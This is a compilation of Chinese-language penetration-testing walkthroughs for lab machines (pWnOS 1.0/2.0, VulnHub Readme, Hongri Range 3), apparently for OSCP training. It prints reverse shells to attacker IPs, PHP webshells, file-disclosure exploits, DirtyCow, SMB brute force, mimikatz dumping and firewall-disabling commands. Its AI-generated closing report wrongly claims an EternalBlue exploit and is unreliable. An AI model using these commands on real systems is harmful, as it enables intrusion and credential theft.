pWnOS系列全教程，Webmin文件披露，Simple PHP Blog渗透教程 pWnOS系列全教程，Webmin文件披露，Simple PHP Blog渗透教程pWnOS1.0打靶思路下载链接见：https://download.vulnhub.com/pwnos/pWnOS_v1.0.zip注意一定要选择这个 “我已移动该虚拟机” ，否则扫描不到靶机。网络模式为nat，开机后使用主机发现命令arp-scan -l端口扫描，端口扫描的内容如下总共有两个http服务，一个是10000端口（注意这里如果登录错误太多了话，会导致你的ip封禁）一个是80端口，点击next我们一路下一步被嘲讽了嘲讽页面的sql注入（像xss，文件包含都试试）http://10.10.10.129/index2.php?name=admin%27%20and%201=1%20--+&level=sk1ll3d+n00b%27%20and%201=1%20--+&submit=Please+Help%21 # sql http://10.10.10.129/index2.php?name=../../../../../../../../etc/passwd&level=../../../../../etc/passwd&submit=../../../../etc/passwd # 文件包含经过一番测试后，发现一个文件包含点http://10.10.10.129/index1.php?help=true&connect=/etc/passwd/etc/shadow 密码文件有了文件包含，但是没有文件上传点，不能通过文件包含图片马的方式获取shell，转换思路，分析/etc/passwd文件，他有四个用户curl 'http://10.10.10.129/index1.php?help=true&connect=/etc/passwd'目录扫描出来一个php文件夹，包含了phpmyadmin站点目录，但是需要进行401认证，弱口令admin/admin，root/root登录失败，那么切换这四个用户试试呢vmware obama osama yomama很遗憾都失败了，我点击了取消，这里出现了指纹信息，phpMyAdmin 2.6.3-pl1上exp可以看到这是一个跨站脚本的漏洞对于我们获取shell用处不是很大，继续切换思路，放眼到10000端口，可以试试之前的用户名（都失败）那么就上exp，Webmin，那么如何选择这些内容呢尽量不选择Metasploit的利用方式，据红队笔记大佬说，Metasploit好比一个黑盒，我们看不到执行的过程，不利于学习渗透（OSCP考试也限制使用msf）。其次需要认证Authenticated的漏洞我们也不选，因为此时我们都不知道如何登录webmin。CSRF的漏洞优先级较低，也先不考虑，我们需要优先考虑能直接获取 shell 的漏洞。所以有用的脚本可能如下，命令执行的有三个 705、746、47293，文件披露（任意文件泄露）的有两个1997、2017文件披露的1997（不行）、2017可以根据提示，得出命令如下，读出/etc/shadow密码文件perl 2017.pl 10.10.10.129 10000 /etc/shadow http用户vmware密码h4ckm3，其他几个都失败由于靶机那边出了点问题，不能让我ssh连接了（源wp是可以的，应该是ssh版本太新了，windows和kali都不行，连不上）这里我就想了个办法，只能用nc反弹了（登录原来的系统）nc 10.10.10.128 6666 -e /bin/bash切换上级目录，可以看到不是交互式终端创建交互式终端python -c 'import pty; pty.spawn("/bin/bash");'系统信息收集，是ubuntu非常老的版本了7.10看看有没有内核提权（没有）sudo -l ，很遗憾了，这个用户好可怜，用不了sudo，和我们一样都是打工仔uname -a cat /etc/os-release # 没有lsb_release -a命令可以使用这个代替 sudo -l # 查看可以使用sudo的文件 find / -perm -4000 -print 2>/dev/null # 查找 SUID文件 ls -al /etc/cron* # 查看所有计划任务 find / -perm 777 -type f 2>/dev/null # 查看文件权限为777的文件信息计划任务，没有一个普通用户能用的，打工仔已经坐不住了回到刚刚读取到的shadow文件，既然能读取shadow文件，那么一定是以root的身份读取这个文件的，如果我们上传一个可执行的脚本呢？利用prel语言来读取并执行这个文件。之所以要将后缀名改为.cgi，我的理解是要将perl语言的代码改写为执行文件，如果不修改后缀名的话，用2017.pl的exp只能以root权限读取shell.pl，而无法执行shell.pl，也就无法反弹shell。cp /usr/share/webshells/perl/perl-reverse-shell.pl shell.cgiWebmin 的可执行文件后缀 无后缀：Webmin 的主可执行文件通常是一个没有后缀的脚本文件，例如 webmin。 .cgi 后缀：Webmin 使用 CGI 脚本来处理 Web 请求，这些脚本文件通常以 .cgi 为后缀。例如， /usr/share/webmin/ 目录下的许多文件都是 .cgi 文件。 .pl 后缀：Webmin 的某些脚本文件可能以 .pl 为后缀，表示它们是 Perl 脚本。例如，/etc/webmin/ 目录下的配置文件和脚本文件可能包含 .pl 后缀。 修改这个可执行文件靶机下载后将文件赋予执行权限which wget wget 10.10.10.128:443/shell.cgi chmod +x shell.cgi继续利用脚本perl 2017.pl 10.10.10.129 10000 /tmp/shell.cgi http反弹成功pWnOS2.0打靶思路下载链接见：https://download.vulnhub.com/pwnos/pWnOS_v1.0.zip下载之后用VMware打开，特别注意，这个靶机的ip是固定的10.10.10.100，我们需要将靶机设置为NAT模式，同时要将攻击机kali的ip也处于10.10.10.0/24这个网段，具体在菜单栏的编辑——虚拟网络编辑器，如下，点击更改设置，保证虚拟机的子网ip是10.10.10.0即可（否则可能扫不到靶机的ip）。主机发现全端口syn扫描访问80端口目录扫描有一个info.php，找到文件/blog/config/这里有两个文件第一个文件内容No Title|No Author|No Footer|english|new_to_old|new_to_old|1|5|1|b,i,strong,em,url|email@myblog.com||||||1||密码文件内容，是一个md5(Unix)类型的加密$1$weWj5iAZ$NU4CkeZ9jNtcP/qrPC69a/返回到主页，测试sql注入sql语句报错，存在sql注入漏洞那么就万能密码，成功登录页面只有一个Welcome admin@isints.com，一个邮箱信息，admin' || 1=1 -- +Powered by Simple PHP Blog 0.4.0 cms的版本指纹信息框中的这第四个有一个msf的exp，远程命令执行（Remote Command Execution），符合条件的只有后面两个他是说这个系统中有三个漏洞，第一个是暴露了 password.txt ，刚开始我们目录扫描的时候已经扫描出来了，第二个在登录用户的图像上传，没有身份验证，上传任意的文件，第三个漏洞是博客评论可以任意删除。看样子是需要我们登录进去了，还有一个exp没有用上插叙：如果出现运行报错Can't locate Switch.pm in @INC，应该是perl版本依赖未安装的问题，运行如下命令即可。sudo apt install libswitch-perl根据他的提示，我们利用 -e 参数，指定好第一个文件上传的选项 1，这里提示我们在网站的images下面创建了一个cmd.php文件访问即可利用python反弹shellpython -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.128",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'这里就不需要创建交互式终端了，这里使用python反弹的shell，默认已经可以交互式了。系统信息收集，属于低版本的ubuntu，首先考虑的是内核提权继续信息收集，返回上级目录，看到一个mysqli_connect.php文件，可以看到mysql的密码信息user : root pass : goodday鉴权失败返回home看到有一个用户，用刚刚的mysql密码登录试试，鉴权失败文件权限信息收集find / -perm 777 -type f 2>/dev/null # 777文件 find / -perm -4000 -print 2>/dev/null # SUID文件sudo -l 意外的发现，www-data用户能够使用sudo，但是不知道密码经过一番折腾后，在var目录下面又找到了一个数据库连接的文件密码为 root@ISIntS又是一个密码信息，大概率是dan用户的admin@isints.com鉴权失败目前已知三个密码信息（其中一个是邮箱）admin@isints.com # 数据表中dan的邮箱 root@ISIntS # 数据库密码 goodday # 假的数据库密码回到刚刚的内核提权，尝试一下已关机。。。。利用失败靶机提权主要是利用已知的所有密码信息，进行密码碰撞，利用数据库连接的密码，切换root用户来进行提权也可以使用第二种方法（考试只能使用一次），msf（不清楚什么原因，漏洞利用成功，建立会话失败，是利用失败的，可以自行尝试）msfconsole search Simple PHP Blog 0.4.0 set rhosts 10.10.10.100 set URI blog set payload php/meterpreter/reverse_tcp run往期推荐网络安全从业者生存指南（硬货篇）【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！绝对干货！Viper一个互联网攻击面管理，红队模拟平台【渗透测试】DC1~9(全) Linux提权靶机渗透教程，干货w字解析，建议收藏【OSCP】Tr0ll 靶机全系列（1-3），FTP被玩坏了ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略

稀有靶机-Readme 这个靶机网上的演示很少很少，唯一一篇csdn文章也没有写详细，就是第二个用户的密码是靠汇编的知识获取到的，而他就直接写了个密码，怎么获取的都没写出来，https://blog.csdn.net/2301_79316009/article/details/140642836这个问题很大，希望原作者能修改修改我这里提到了，唯一盲点就是fixed.nasm的编写，很懵，回头一定恶补靶机链接：https://www.vulnhub.com/entry/readme-1,336/主机发现80探测访问网页端口扫描的mysql服务拒绝连接，说明没有开启远程连接目录扫描php版本reminder.php，这里有一个人名 Julian，告诉我们有一个txt文件Also, can you fix this search box? Sometimes it chucks errors depending on what I enter... I'd do it myself, but I've been busy trying to create some code to enable us to securely store our passwords, seeing as you keep forgetting yours... The encoder seems completely borked though. 大致意思就是，这个输入框会报一些错误，让你修复测一测sql注入，sql语法错误，存在sql注入漏洞，但是没有回显啊，放弃了sqlmap结果看另外一个文件，有一个adminermysql服务失效使用内网地址，不允许连接到mysql服务器返回有一个图片的地方，源码泄露了一个路径访问路径文件内容ssh用户julian密码爆破的结果漏洞检索，也没有结果连接靶机的mysql不行，那么连接你攻击机的mysql呢？将你得mysql服务器（kali）开启远程连接，将这一行注释掉vim /etc/mysql/mariadb.conf.d/50-server.cnf重启mysqlsudo service mysql restart设置mysql密码，并登录sudo mysqladmin -u root password 'root' mysql -u root -h 192.168.111.128 -p # 输入你得密码创建登录数据库，新加一个数据create database test; # 创建一个test数据库 use test # 切换到test数据库 create table demo(id int,name text); # 创建一个普通的表 insert into demo values(1,'demofefhkhakfh'); # 添加任意数据 select * from demo; +------+----------------+ | id | name | +------+----------------+ | 1 | demofefhkhakfh | +------+----------------+ 1 row in set (0.000 sec)这里我们就能进行远程连接了连接成功这里再结合之前暴露出来的路径信息执行如下命令load data local infile "/etc/julian.txt" into table demo;为空，检查一下原因设置一下local_infileSET GLOBAL local_infile = true; SHOW GLOBAL VARIABLES LIKE 'local_infile';检查secure_file_privSHOW GLOBAL VARIABLES LIKE 'secure_file_priv';这些都没问题，就是sql语句错了，可以看看这篇老外写的文章https://rastating.github.io/readme-walkthrough/正确的sql语句因该如下才对（和原来的对比就是少了个字段）# 原失败的sql语句 load data local infile "/etc/julian.txt" into table demo; # 成功的sql语句，这里设置了一个终止符，并且添加了一个指定字段的分隔符 load data local infile '/etc/julian.txt' into table test.demo fields terminated by "n";同理，包含/etc/passwd，也可以成功sql语句如下load data local infile '/etc/passwd' into table test.demo fields terminated by "n";但是包含了passwd文件，并没有julian这个用户，可能显示上限了吧，用密码登录一下，和上面对比，验证了我们刚刚的结论I_mean...WhoThoughtLettingTheMySQLClientTransmitFilesWasAGoodIdea?Sheesh漏洞利用原理自行查看，这篇文章写的不错：https://wiki.96.mk/Web%E5%AE%89%E5%85%A8/Adminer/Adminer%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E/登录成功后，信息收集识别hash类型，是MD5sudo再切换用户的目录，有一个poc.c，编译一下开启了http服务，看样子有防火墙继续信息收集端口和进程信息suid文件历史命令那还能咋办嘞，c的源码是有的，我们可以直接将c的源码复制到kali进行编译就行，先分析一下源码吧，基本的信息收集已经没有什么可以利用的了，这里需要将这个 poc 编译，还有那个 payload.bin来获取密码 payload.bin：一个包含了 shellcode, 和 tatham用户的密码信息 poc.c ：一个需要放置shellcode并运行他的文件 #include <stdio.h> #include <string.h> int main(void) { unsigned char code[] = ""; void (*s)() = (void *)code; s(); return 0; }在kali中报了如下错误依次执行如下命令即可dpkg --add-architecture i386 apt-get update apt-get install libc6-dev-i386编译成功这里又要用到反汇编了，完整的poc.c如下这里要用到gdb调试工具自动解码还有手动解码，两种方法，计算shellcode的原始十六进制字节，然后生成一个fixed.nasm有效载荷，这个文件的内容如下，这个文件的编写（这个文件内容如何编写的，这就涉及到知识盲区了，太菜了，不会逆向），可以参考如下文章，关于这个靶机，网上的资料太少太少了https://rastating.github.io/readme-walkthrough/global _start section .text _start: ; set the frame pointer mov ebp, esp ; clear required registers xor eax, eax xor ebx, ebx xor ecx, ecx xor edx, edx ; push encoded password onto stack push 0x7f7f1312 push 0x157b2f22 push 0x13247312 push 0x087b0423 push 0x73287022 push 0x30280912 push 0x3b162f20 push 0x360e1919 push 0x157b0913 push 0x757b0960 push 0x70167510 push 0x2d162f25 push 0x73241923 push 0x09167527 push 0x1a772b0c push 0x37787217 ; calculate size of password and store in $ecx lea ecx, [ebp] sub ecx, esp ; begin xor on the encoded password decode_loop: ; if at dword 12, xor with F lea edx, [0x14] cmp ecx, edx jz xor_f ; if at dword 11, xor with E lea edx, [0x18] cmp ecx, edx jz xor_e ; if at dword 10, xor with E lea edx, [0x1c] cmp ecx, edx jz xor_e ; if at dword 9, xor with B lea edx, [0x20] cmp ecx, edx jz xor_b ; if at dword 8, xor with D lea edx, [0x24] cmp ecx, edx jz xor_d ; if at dword 7, xor with 4 lea edx, [0x28] cmp ecx, edx jz xor_4 ; if at dword 6, xor with E lea edx, [0x2c] cmp ecx, edx jz xor_e ; if at dword 3, xor with D lea edx, [0x38] cmp ecx, edx jz xor_d ; if at none of the unique indexes ; xor with A. jmp xor_a short_loop_jmp: jmp decode_loop xor_f: lea ebx, [0x41414146] jmp xor_eof xor_e: lea ebx, [0x41414145] jmp xor_eof xor_b: lea ebx, [0x41414142] jmp xor_eof xor_d: lea ebx, [0x41414144] jmp xor_eof xor_4: lea ebx, [0x41414134] jmp xor_eof xor_a: lea ebx, [0x41414141] jmp xor_eof xor_eof: lea eax, [ebp] sub eax, ecx xor [eax], ebx sub dword [eax], 0x01010101 sub ecx, 0x4 xor eax, eax cmp ecx, eax jnz short_loop_jmp int3 int3 int3 int3依次执行，会生成一个a.out文件，该文件是修复后的可执行文件，我们使用gdb运行它启动此文件就好了，并查看这个xor_eof()函数反汇编信息查看寄存器状态，并使用格式说明符（查看内存的内容，并且提供了不同的格式和选项来指定如何显示这些内容）基本用法如下x/<n><f> <address> n 是要显示的单元数量（可选），表示要查看多少个内存单元。 f 是格式说明符，可以用来指定数据类型或格式。 <address> 是你想要查看的内存地址。 格式说明符在 x/ 命令中使用的格式说明符可以包括： b：以字节（byte）为单位显示。 h：以半字（short）为单位显示，通常为 2 字节。 w：以单字（word）为单位显示，通常为 4 字节（在某些平台上可能不同）。 g：以双字（double word）为单位显示，通常为 8 字节。 s：以字符串的形式显示，通常以 null 结尾。 f：以浮点数格式显示（比如 float 或 double）。 i：以指令的格式显示，适用于机器指令。 例子 查看从某个地址开始的 10 个字节：x/10b 0x08048000 查看从某个地址开始的 5 个整型（常用 4 字节）值：x/5w 0x08048000 以字符串形式查看从某个地址开始的内容：x/s 0x08048000 查看机器指令i，和s一个一个试试，会找到一个base编码我们解码看看，这不就是我们要的密码嘛密码：So...YouFiguredOutHowToRecoverThisHuh?GGWPnoRE往期推荐【oscp】Blender软件的信息泄露---VulnOSv2【oscp】Tr0ll 靶机全系列（1-3），FTP被玩坏了HTB-Chemistry靶机渗透教程【渗透测试】DC1~9(全) Linux提权靶机渗透教程，干货w字解析，建议收藏【kali笔记】shodan常见的20种基本使用方法，信息收集必备

红日靶场3，joomla渗透，海德拉SMB爆破，域内5台主机横向移动教学 这是红日团队的第三套靶场，本次靶场渗透涉及敏感信息泄露、暴力破解、脏牛提权、内网穿透、端口转发、以及域渗透等多种知识点。该靶场环境由5台机器组成，其中包括3台Windows机器和2台Linux机器。网络拓扑图如下红日靶场（1-8）全套下载连接：链接:https://pan.baidu.com/s/1ppyPlm6osobxReI50fCSZw?pwd=uze8 提取码:uze8 红日官网：http://vulnstack.qiyuanxuetang.net/那么开始渗透首先添加一张网卡（仅主机模式），192.168.93.0/24 网段web-centos 进去第一条命令，重启网络服务，否则可能上不了网service network restart 网卡1：桥接模式 192.168.1.110网卡2：仅主机 192.168.93.100账号密码：wwwuser/wwwuser_123Aqxweb1-ubuntu仅主机模式：192.168.93.120PC仅主机：192.168.93.30win 2008仅主机：192.168.93.20 Windows 2008本地的管理员用户和域管理员的密码 WIN2008Administrator：123qwe!ASD TESTadministrator：zxcASDqw123!!win 2012仅主机：192.168.93.10kaliIP：192.168.1.8，192.168.1.5（中间换了换 IP）这是一个黑盒测试，开机后就不要进行任何的操作了。外网打点主机发现，因为是桥接模式，ip有点多，所以就挨个测试，看110很可疑，第一次就测出来了22端口，openssh 5.3版本，80端口 nginx 1.9.4 ，Joomla内容管理xi'tong3306测试，发现可以远程登录，但是我们不知道用户信息进一步信息收集查看源码丢给deepseek，看看有没有泄露版本另外在joomla这个cms内容管理系统中呢，这个文件存在版本信息，我们可以看看/administrator/manifests/files/joomla.xml上面可以看到cms的指纹信息了，版本为3.9.12，下面进行漏洞检索searchsploit Joomla 3.9漏洞信息里面是没有可以利用的漏洞的，下面我们用joomscanapt install joomscan joomscan --url http://192.168.1.110/JoomScan 是一款专门针对 Joomla 内容管理系统（CMS）的安全扫描工具，用于检测 Joomla 网站中的漏洞、配置错误和安全风险。扫描出来一个这个东西，访问即可curl http://192.168.1.110/configuration.php~服务攻防找到了mysql的账号密码，刚开始我们已经测试过能远程登录mysql的mysql -utestuser -h192.168.1.110 -p --skip-ssl 密码：cvcvgjASD!@ MySQL [joomla]> use joomla; MySQL [joomla]> select * from umnbt_users;很明显是加了盐的，破解起来很难，这里还有另外一个表am2zu_users查看是否能向外部写文件，以及是否允许写日志文件show variables like '%general%'; SHOW VARIABLES LIKE 'general_log_file';这里发现secure_file_priv是允许向外部写文件的，那么我们尝试写一个shell木马，报错了，看样子是不允许我们写入的MySQL [joomla]> select '<?php phpinfo();@eval($_GET[1]);?>' into outfile '/var/www/html/shell.php'; ERROR 1045 (28000): Access denied for user 'testuser'@'%' (using password: YES)那么更换日志渗透的方法，上面看到日志功能是off的我们需要no，很遗憾也是权限不够MySQL [joomla]> set global general_log=on; ERROR 1227 (42000): Access denied; you need (at least one of) the SUPER privilege(s) for this operation那么久添加后台用户进一步渗透，两个表中呢，我们不清楚哪个表是后台的用户表，那么就都添加一条数据，密码为123456的md5，e10adc3949ba59abbe56e057f20f883e，首先我们要看看需要添加哪些字段desc 表名; id,name,username,email,password,activation,otpKey,otep构造sql语句insert into am2zu_users(id,name,username,email,password,activation,otpKey,otep) values(999,'xiaoyu','xiaoyu@test.com','e10adc3949ba59abbe56e057f20f883e','ssssss','kkkkkk','yyyyy'); # 失败后面搜到了这个网站，有利用方法https://docs.joomla.org/How_do_you_recover_or_reset_your_admin_password%3F/zh-cn代码如下INSERT INTO `am2zu_users` (`name`, `username`, `password`, `params`, `registerDate`, `lastvisitDate`, `lastResetTime`) VALUES ('Administrator2', 'admin2', 'd2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199', '', NOW(), NOW(), NOW()); INSERT INTO `am2zu_user_usergroup_map` (`user_id`,`group_id`) VALUES (LAST_INSERT_ID(),'8');执行结果MySQL [joomla]> INSERT INTO `am2zu_users` -> (`name`, `username`, `password`, `params`, `registerDate`, `lastvisitDate`, `lastResetTime`) -> VALUES ('Administrator2', 'admin2', -> 'd2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199', '', NOW(), NOW(), NOW()); Query OK, 1 row affected (0.001 sec) MySQL [joomla]> select * from `am2zu_users`; +-----+----------------+---------------+---------------+-------------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+--------+---------------------+------------+--------+------+--------------+ | id | name | username | email | password | block | sendEmail | registerDate | lastvisitDate | activation | params | lastResetTime | resetCount | otpKey | otep | requireReset | +-----+----------------+---------------+---------------+-------------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+--------+---------------------+------------+--------+------+--------------+ | 891 | Super User | administrator | test@test.com | $2y$10$t1RelJijihpPhL8LARC9JuM/AWrVR.nto/XycrybdRbk8IEg6Dze2 | 0 | 1 | 2019-10-19 12:48:41 | 0000-00-00 00:00:00 | 0 | | 0000-00-00 00:00:00 | 0 | | | 0 | | 896 | Administrator2 | admin2 | | d2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199 | 0 | 0 | 2025-02-25 19:56:54 | 2025-02-25 19:56:54 | | | 2025-02-25 19:56:54 | 0 | | | 0 | +-----+----------------+---------------+---------------+-------------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+--------+---------------------+------------+--------+------+--------------+ 2 rows in set (0.001 sec) MySQL [joomla]> INSERT INTO `am2zu_user_usergroup_map` (`user_id`,`group_id`) -> VALUES (896,'8'); Query OK, 1 row affected (0.001 sec) MySQL [joomla]> select * from `am2zu_user_usergroup_map`; +---------+----------+ | user_id | group_id | +---------+----------+ | 891 | 8 | | 896 | 8 | +---------+----------+ 2 rows in set (0.001 sec)从上面那个网站可以知道账号密码为admin2/secret（注意数据一定要对应上，用户id需要对应，并且不能有重复的数据，否则都有可能登录不成功）我们修改主题文件为kali默认的反弹shell文件内容，并修改ip和端口但是呢反弹失败了，切换思路写一句话木马<?php @eval($_POST['pass']);?>使用蚁剑连接内网渗透这里呢被禁用命令了，也难怪刚刚反弹不成功这里我们需要蚁剑的一个插件（魔法）在列表页使用插件使用这个模式就可以正常执行命令啦，后面又试了试各种反弹shell的命令，都没有成功，那么只能利用这个蚁剑的shell了在/tmp/mysql/test.txt文件中有账号密码wwwuser/wwwuser_123Aqxssh连接失败，提示信息为算法问题那么需要加上算法ssh wwwuser@192.168.1.110 -oHostKeyAlgorithms=+ssh-rsa -oPubkeyAcceptedKeyTypes=+ssh-rsa # 以下是常见的解决方案 ssh -oHostKeyAlgorithms=ssh-rsa,ssh-dss vmware@10.10.10.130 # Unable to negotiate with 10.10.10.129 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss ssh ubuntu@10.10.10.131 -oPubkeyAcceptedKeyTypes=+ssh-rsa -i id_rsa ssh -oHostKeyAlgorithms=+ssh-rsa -oPubkeyAcceptedKeyTypes=+ssh-rsa -i rain_rsa ubuntu@10.10.10.131内网信息收集使用icmp协议探测内网ip存活数量，发现了另外4台主机（）for i in {1..254}; do (ping -c 1 192.168.93.${i} | grep "bytes from" | grep -v "Unreachable" &); done;上传frpkali开启frp服务器，frp相对详细使用教程见-- 三种代理方式打入内网靶机连接kali的frp服务器修改代理文件vi /etc/proxychains4.conf分别对10，20，120进行端口扫描（耗时可能有点久），第一台和第三台都是windows服务器proxychains nmap -sT -sV -Pn 192.168.93.10 -T4proxychains nmap -sT -sV -Pn 192.168.93.20 -T4proxychains nmap -sT -sV -Pn 192.168.93.30 -T4这台扫描结果是Linux的服务器，开着ssh和3306端口，并且80也开着的proxychains nmap -sT -sV -Pn 192.168.93.120 -T4开启浏览器代理，代理到我们的kali，通过kali的代理访问这个内网靶机这是内网中的一个靶机，也是同样的cms，那么我们可不可以以同样的方式去获取密码再次利用joomscan这个工具，扫描结果也是一样的proxychains joomscan --url http://192.168.93.120/和刚刚的配置文件一模一样，那么大概率是使用的内网映射了，源主机是120，但是访问的是100那台具有nat网卡的主机连接ssh后，继续信息收集提权（可跳过）# kali git clone https://github.com/firefart/dirtycow.git cd dirtycow python -m http.server 5000 # 靶机 wget 192.168.1.8:5000/dirty.c gcc -pthread dirty.c -o dirty -lcrypt ./dirty my-new-password mv /tmp/passwd.bak /etc/passwd su firefart password:123456成功提权到最高权限第一台web服务器拿下利用nmap对两台windows靶机的445端口进行漏洞扫描，判断是否存在永恒之蓝漏洞（三台接没有）那么还有一种方法就是SMB爆破了，非常巧，在我的top1000字典中恰好没有这个密码（所以为了伪装成一个大佬我就手动把密码加了进去~），再很巧，两个靶机的smb密码都是123qwe!ASDproxychains hydra -l Administrator -P xato-net-10-million-passwords-1000.txt -s 445 -t 4 -vV -m "SMB" smb://192.168.93.30 proxychains hydra -l Administrator -P xato-net-10-million-passwords-1000.txt -s 445 -t 4 -vV -m "SMB" smb://192.168.93.20域渗透本机windows打开 proxifier，并设置全局代理打开本机windows的cmd，此时就能连接第一台smb服务器，192.168.93.20net use \192.168.93.20ipc$ "123qwe!ASD" /user:administrator # 通过 net use 命令连接到目标服务器的 IPC$ 共享。 dir \192.168.93.20c$ # 列出目标服务器上 C$ 共享目录的内容。第二台192.168.93.30那么接下来就要关闭目标防火墙，开启远程连接，首先创建一个进程，关闭失败sc \192.168.93.20 create unablefirewall binpath= "netsh advfirewall set allprofiles state off" sc \192.168.93.20 start unablefirewall那么添加计划任务关闭防火墙试试呢at \192.168.93.20 23:17:00 'netsh advfirewall set allprofiles state off' at \192.168.93.20 23:17:00 'netsh advfirewall set allprofiles state off'接下来就是修改注册表了，计划任务设置允许远程登录at \192.168.93.20 23:31:00 "reg add 'HKLMSYSTEMCurrentControlSetControlTerminal Server' /v fDenyTSConnections /t REG_DWORD /d 0 /f"计划任务放行3389端口at \192.168.93.20 23:32:00 'netsh advfirewall firewall add rule name="Remote Desktop TCP" dir=in action=allow protocol=TCP localport=3389'尝试远程连接，连接失败，切换思路既然无法关闭那么就使用MSF咯proxychains MSFconsole set RHOST 192.168.93.20 set LHOST 192.168.93.5 # kali地址 set SMBUser Administrator set SMBPass 123qwe!ASD set LPORT 4444 set payload windows/x64/shell_bind_tcp run这里就已经是系统权限了。。。。并且主机名为win2008查看dns服务器，为192.168.93.10，大概率就是域控服务器了ipconfig /all尝试使用密码123qwe!ASD登录域控服务器其他信息收集，检查是否存在杀软windows defender（不存在）sc query WinDefend查看系统类型，是x64的C:Windowssystem32>systeminfo | findstr /i "system type" systeminfo | findstr /i "系�system type" OS Build Type: Multiprocessor Free System Type: x64-based PC上传mimikatz.exeexit set payload windows/x64/meterpreter/bind_tcp run upload -r /data/windows_atk/mimikatz/x64/mimikatz.exe C:\使用shell执行命令，执行失败了那么就退出，使用shell_bind_tcp模块exit set payload windows/x64/shell_bind_tcp run抓取铭文密码mimikatz.exe log privilege::debug sekurlsa::logonpasswords得到两个域的账号密码，枚举DNS服务器的文件系统TEST：zxcASDqw123!! WIN2008：123qwe!ASD开启远程服务# 放行3389端口 netsh advfirewall firewall add rule name="Remote Desktop TCP" dir=in action=allow protocol=TCP localport=3389 # 关闭防火墙 netsh advfirewall set allprofiles state off # 修改注册表允许远程连接 reg add "HKLMSYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f成功获取20靶机远程操作权限使用test域登录dns服务器，登录成功net use \192.168.93.10ipc$ "zxcASDqw123!!" /user:Administrator dir \192.168.93.10c$创建执行任务，关闭防火墙，执行不了奥sc \192.168.93.10 create unablefirewall binpath= "netsh advfirewall set allprofiles state off" sc \192.168.93.10 start unablefirewall那么就利用nc.exe反弹shellcurl -O http://192.168.1.5:5000/nc.exe net use \192.168.93.10ipc$ "zxcASDqw123!!" /user:Administrator copy .nc.exe \192.168.93.10c$ net use \192.168.93.20ipc$ "123qwe!ASD" /user:Administrator copy .nc.exe \192.168.93.20c$可以看到nc已经上传成功了创建一个进程sc \192.168.93.10 create ncshell binpath= "c:nc.exe 192.168.93.20 1234 -e cmd" sc \192.168.93.10 start ncshell在反弹过来的shell中开启远程连接# 放行3389端口 netsh advfirewall firewall add rule name="Remote Desktop TCP" dir=in action=allow protocol=TCP localport=3389 # 关闭防火墙 netsh advfirewall set allprofiles state off # 修改注册表允许远程连接 reg add "HKLMSYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f使用远程登录，即可发现允许远程登录了（注意Proxifier全局代理不能断掉）拿下winserver2012域控服务器现在已经拿下了三台，那么接下来就是第四台win7（pc），ip：30，回到刚刚的MSFset RHOSTS 192.168.93.30开启远程连接# 放行3389端口 netsh advfirewall firewall add rule name="Remote Desktop TCP" dir=in action=allow protocol=TCP localport=3389 # 关闭防火墙 netsh advfirewall set allprofiles state off # 修改注册表允许远程连接 reg add "HKLMSYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f此时已经可以远程连接，输入之前获得的密码即可拿下第最后一台PC主机至此渗透结束，还可以清除日志，关闭全部远程，恢复到初始状态，做好隐蔽措施渗透测试报告总结（deepseek）1. 测试概述本次渗透测试模拟了针对某企业网络的全流程攻击，覆盖外网打点、内网横向渗透、域控提权等多个阶段。目标网络包含Web服务器（CentOS/ubuntu）、Windows域环境（2008/2012）及内网PC终端（Win7），最终成功获取域控服务器（Windows Server 2012）及全部内网主机的控制权。2. 攻击路径总览graph TD A[外网入口: Web-CentOS] --> B{漏洞利用} B --> C[Joomla 3.9.12后台接管] C --> D[MySQL凭据泄露] D --> E[Webshell上传 & 蚁剑连接] E --> F[SSH登录 & 内网代理搭建] F --> G[内网主机发现] G --> H[横向移动: SMB爆破 & 永恒之蓝漏洞利用] H --> I[域控服务器渗透] I --> J[域内PC终端控制]3. 外网打点阶段3.1 目标识别 IP地址：192.168.1.110（桥接模式） 开放服务： 22端口：OpenSSH 5.3 80端口：Nginx 1.9.4 + Joomla 3.9.12 3306端口：MySQL 5.5.62 3.2 关键漏洞利用(1) Joomla后台接管 漏洞利用：通过configuration.php~备份文件泄露获取MySQL凭据 攻击链： # 数据库操作 INSERT INTO am2zu_users (...) VALUES (...); # 添加管理员账号 INSERT INTO am2zu_user_usergroup_map (...) VALUES (...); # 分配权限 结果：成功登录Joomla后台（admin2/secret） (2) Webshell植入 方法：通过模板编辑注入PHP一句话木马 工具：蚁剑连接http://192.168.1.110/shell.php 提权：利用Dirty Cow漏洞从wwwuser提权至root 4. 内网横向渗透4.1 网络拓扑分析 网段划分： 仅主机模式：192.168.93.0/24 关键主机： 192.168.93.10（域控-Win2012） 192.168.93.20（Win2008） 192.168.93.30（Win7-PC） 4.2 代理隧道搭建 工具：frp反向代理 配置：# frpc.ini [common] server_addr = 192.168.1.8 server_port = 7000 [socks5] type = tcp remote_port = 1080 plugin = socks5 4.3 横向移动关键步骤(1) SMB服务爆破 工具：Hydra 命令： proxychains hydra -l Administrator -P passlist.txt smb://192.168.93.20 结果：破解密码123qwe!ASD，获取Win2008控制权 (2) 永恒之蓝漏洞利用 模块：exploit/windows/smb/ms17_010_eternalblue Payload：windows/x64/meterpreter/reverse_tcp 结果：获取Win2008系统级Shell 5. 域渗透与域控提权5.1 域环境分析 域名称：TEST 域控IP：192.168.93.10 关键凭证： WIN2008Administrator:123qwe!ASD TESTadministrator:zxcASDqw123!! 5.2 